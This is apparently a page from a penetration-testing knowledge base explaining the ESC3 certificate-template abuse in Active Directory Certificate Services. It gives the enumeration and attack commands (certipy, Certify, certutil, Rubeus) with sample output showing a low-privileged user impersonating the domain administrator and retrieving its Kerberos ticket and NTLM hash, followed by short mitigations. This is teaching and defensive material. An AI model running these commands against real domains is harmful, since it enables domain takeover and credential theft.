Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Description
  • Requirements for attack path (1st condition)
  • Requirements for attack path (2nd condition)
  • Linux - Enumeration
  • Linux - Performing the attack
  • Windows - Enumeration
  • Windows - Performing the attack
  • Mitigations

Was this helpful?

  1. Everything
  2. Everything Active Directory and Windows
  3. ADCS

ESC3

Description

ESC3 attacks make use of certificate templates that have EKU's that allow for "Certificate Request Agent". This EKU enables a principal to request a certificate on behalf of another user.

Requirements for attack path (1st condition)

  • Enrolment rights granted to a user or group for which we have access to

  • Manager approval not enabled

  • Authorized signatures are not required

  • Either the certificate EKU is set for "Certificate Request Agent". Or the certificate EKU is set for "Any Purpose"

Requirements for attack path (2nd condition)

Providing the above conditions are met for the certificate template with "Certificate Request Agent" EKU set. The following, second condition set needs to be met on a second template.

  • Enrolment rights granted to a user or group for which we have access to

  • Manager approval not enabled

  • The template defines an EKU which can be used for authentication for example "Client Authentication"

  • The template schema version is 1 or greater than 2 specifies an Application Policy Issuance Requirement that necessitates the Certificate Request Agent EKU.

  • No restrictions on enrollment agents are implemented at the CA level.

A likely candidate for the 2nd condition template is the default "User" template.

Linux - Enumeration

certipy find -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -enabled -stdout -vulnerable

Linux - Performing the attack

Perform the initial request to the identified certificate configued with the EKU "Certificate Request Agent".

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC3' -out cert
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.10.2[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Moe@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1105'
[*] Saved certificate and private key to 'cert.pfx'

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes Client Authentication in its Extended Key Usage (EKU) settings.

For accuracy and to avoid certificate mismatch issues we should always aim to provide the -sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).

certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'user' -on-behalf-of 'security\administrator' -sid S-1-5-21-13999771-2333344039-1820745628-500 -pfx cert.pfx
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 18
[*] Got certificate with UPN 'administrator@SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'

Finally, use the certificate file to obtain the user credentials.

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100
[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bc

Windows - Enumeration

.\Certify.exe find /vulnerable

Identify certificates that can be used for client authentication

.\Certify.exe find /enabled /clientauth

Windows - Performing the attack

Request a certificate for the template vulnerable to ESC3.

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC3-P1

Take the private key and certificate output and place them into seperate files.

cert.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
cert.pem
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\cert.pem .\cert.pfx

We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes Client Authentication in its Extended Key Usage (EKU) settings.

For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter which should be the value of the UPN we are targeting (administrator@security.local in the example below).

.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:User /onbehalfof:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500 /enrollcert:cert.pfx

Aagin, take the new key and certificate output and place them into seperate files.

admin.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
admin.pem
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----

Then merge them together with certutil to create a .pfx file.

certutil -MergePFX .\admin.pem .\admin.pfx
# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials

# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap
< -- Snip -->

  ServiceName              :  krbtgt/security
  ServiceRealm             :  SECURITY.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  SECURITY.LOCAL
  StartTime                :  04/03/2025 19:25:09
  EndTime                  :  05/03/2025 05:25:09
  RenewTill                :  11/03/2025 19:25:09
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  30AP07EilJ/mM6LsDioVPw==
  ASREP (key)              :  C2E0C2C00D58B05671F7DA68F4D72796

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 2B576ACBE6BCFDA7294D6BD18041B8FE

Mitigations

  • Require manager aprovals on the certificate

  • Require authorized signatures

  • Remove weak enrollement permissions from the template

  • Replace "Any Purpose" (If configured) for a less descriptive one

  • Use Enrollment Agent restrictions on the Certificate Authority level. For example, you might want to restrict which users are allowed to act as an Enrollment Agent, and which templates can be requested.

Last updated 2 months ago

Was this helpful?